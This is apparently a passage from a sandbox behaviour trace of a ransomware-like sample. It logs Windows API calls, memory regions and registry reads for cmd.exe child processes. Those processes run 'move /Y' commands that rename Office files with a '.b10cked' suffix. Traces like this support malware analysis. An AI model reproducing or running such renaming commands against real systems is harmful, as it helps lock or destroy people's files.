_wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.477] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.477] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.477] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.477] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.477] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.477] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.477] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0173.477] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.477] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.477] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.477] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.477] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.477] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.478] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f60c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f604, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f604*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.479] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.502] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.503] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.503] _wcsicmp (_String1="PUBWZI~1.TRX", _String2=".") returned 66 [0173.503] _wcsicmp (_String1="PUBWZI~1.TRX", _String2="..") returned 66 [0173.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzi~1.trx")) returned 0x2020 [0173.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x361f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.503] SetErrorMode (uMode=0x0) returned 0x0 [0173.503] SetErrorMode (uMode=0x1) returned 0x0 [0173.503] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", nBufferLength=0x104, lpBuffer=0x18ef94, lpFilePart=0x18ef7c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", lpFilePart=0x18ef7c*="PUBWZI~1.TRX") returned 0x3c [0173.503] SetErrorMode (uMode=0x0) returned 0x1 [0173.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.503] _wcsicmp (_String1="PUBWZI~1.TRX", _String2=".") returned 66 [0173.503] _wcsicmp (_String1="PUBWZI~1.TRX", _String2="..") returned 66 [0173.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzi~1.trx")) returned 0x2020 [0173.504] SetErrorMode (uMode=0x0) returned 0x0 [0173.504] SetErrorMode (uMode=0x1) returned 0x0 [0173.504] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", nBufferLength=0x104, lpBuffer=0x18f410, lpFilePart=0x18f1a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", lpFilePart=0x18f1a8*="PUBWZI~1.TRX") returned 0x3c [0173.504] SetErrorMode (uMode=0x0) returned 0x1 [0173.504] SetErrorMode (uMode=0x0) returned 0x0 [0173.504] SetErrorMode (uMode=0x1) returned 0x0 [0173.504] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f618, lpFilePart=0x18f1a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked", lpFilePart=0x18f1a8*="PUBWZINT.REST.trx_dll.b10cked") returned 0x4d [0173.504] SetErrorMode (uMode=0x0) returned 0x1 [0173.504] SetLastError (dwErrCode=0x0) [0173.504] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzint.rest.trx_dll.b10cked")) returned 0xffffffff [0173.504] GetLastError () returned 0x2 [0173.504] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x18eb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb24) returned 0x362138 [0173.504] FindNextFileW (in: hFindFile=0x362138, lpFindFileData=0x18eb24 | out: lpFindFileData=0x18eb24) returned 0 [0173.505] GetLastError () returned 0x12 [0173.505] FindClose (in: hFindFile=0x362138 | out: hFindFile=0x362138) returned 1 [0173.506] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x361cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361cc8) returned 0x362138 [0173.506] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18edbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0173.506] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18edbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0173.506] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzint.rest.trx_dll")) returned 0x2020 [0173.506] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzint.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pubwzint.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.507] FindClose (in: hFindFile=0x362138 | out: hFindFile=0x362138) returned 1 [0173.507] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18ed70 | out: _Buffer=" 1") returned 9 [0173.507] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.507] GetFileType (hFile=0x7) returned 0x2 [0173.507] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.507] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18ecfc | out: lpMode=0x18ecfc) returned 1 [0173.507] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.507] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18ed30 | out: lpConsoleScreenBufferInfo=0x18ed30) returned 1 [0173.507] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.508] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18ed70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.508] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18ed54, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ed54*=0x1a) returned 1 [0173.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.508] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.508] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.508] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.508] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.508] SetConsoleInputExeNameW () returned 0x1 [0173.508] GetConsoleOutputCP () returned 0x1b5 [0173.508] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.508] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.509] exit (_Code=0) Process: id = "302" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ee0" os_pid = "0x8a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23590 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23591 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23592 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23593 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23594 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23595 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23596 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23597 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23598 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23599 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23742 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23743 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23744 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23745 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 23746 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 23747 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23748 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23749 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23750 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23751 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23752 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23753 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23754 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23755 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23756 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 23757 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23758 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23759 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23760 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23761 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23762 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23763 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 23764 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 23765 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 401 os_tid = 0x954 [0173.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fb3c | out: lpSystemTimeAsFileTime=0x26fb3c*(dwLowDateTime=0x9d5a23c0, dwHighDateTime=0x1d440a9)) [0173.560] GetCurrentProcessId () returned 0x8a8 [0173.560] GetCurrentThreadId () returned 0x954 [0173.560] GetTickCount () returned 0x32876 [0173.560] QueryPerformanceCounter (in: lpPerformanceCount=0x26fb34 | out: lpPerformanceCount=0x26fb34*=23034899796) returned 1 [0173.561] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.561] __set_app_type (_Type=0x1) [0173.561] __p__fmode () returned 0x76b331f4 [0173.561] __p__commode () returned 0x76b331fc [0173.561] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.561] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.561] GetCurrentThreadId () returned 0x954 [0173.561] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x954) returned 0x38 [0173.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.561] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.561] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.562] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26facc | out: phkResult=0x26facc*=0x0) returned 0x2 [0173.562] VirtualQuery (in: lpAddress=0x26fb03, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.562] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.562] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.562] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.562] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa9c, dwLength=0x1c | out: lpBuffer=0x26fa9c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.562] GetConsoleOutputCP () returned 0x1b5 [0173.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.562] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.562] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.563] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.563] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.563] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.563] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.563] GetEnvironmentStringsW () returned 0x350210* [0173.563] FreeEnvironmentStringsW (penv=0x350210) returned 1 [0173.564] GetEnvironmentStringsW () returned 0x350210* [0173.564] FreeEnvironmentStringsW (penv=0x350210) returned 1 [0173.564] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea3c | out: phkResult=0x26ea3c*=0x40) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0xa0, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x1, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0x1, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x0, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x40, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x40, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0x40, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegCloseKey (hKey=0x40) returned 0x0 [0173.564] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea3c | out: phkResult=0x26ea3c*=0x40) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0x40, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x1, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0x1, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x0, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x9, 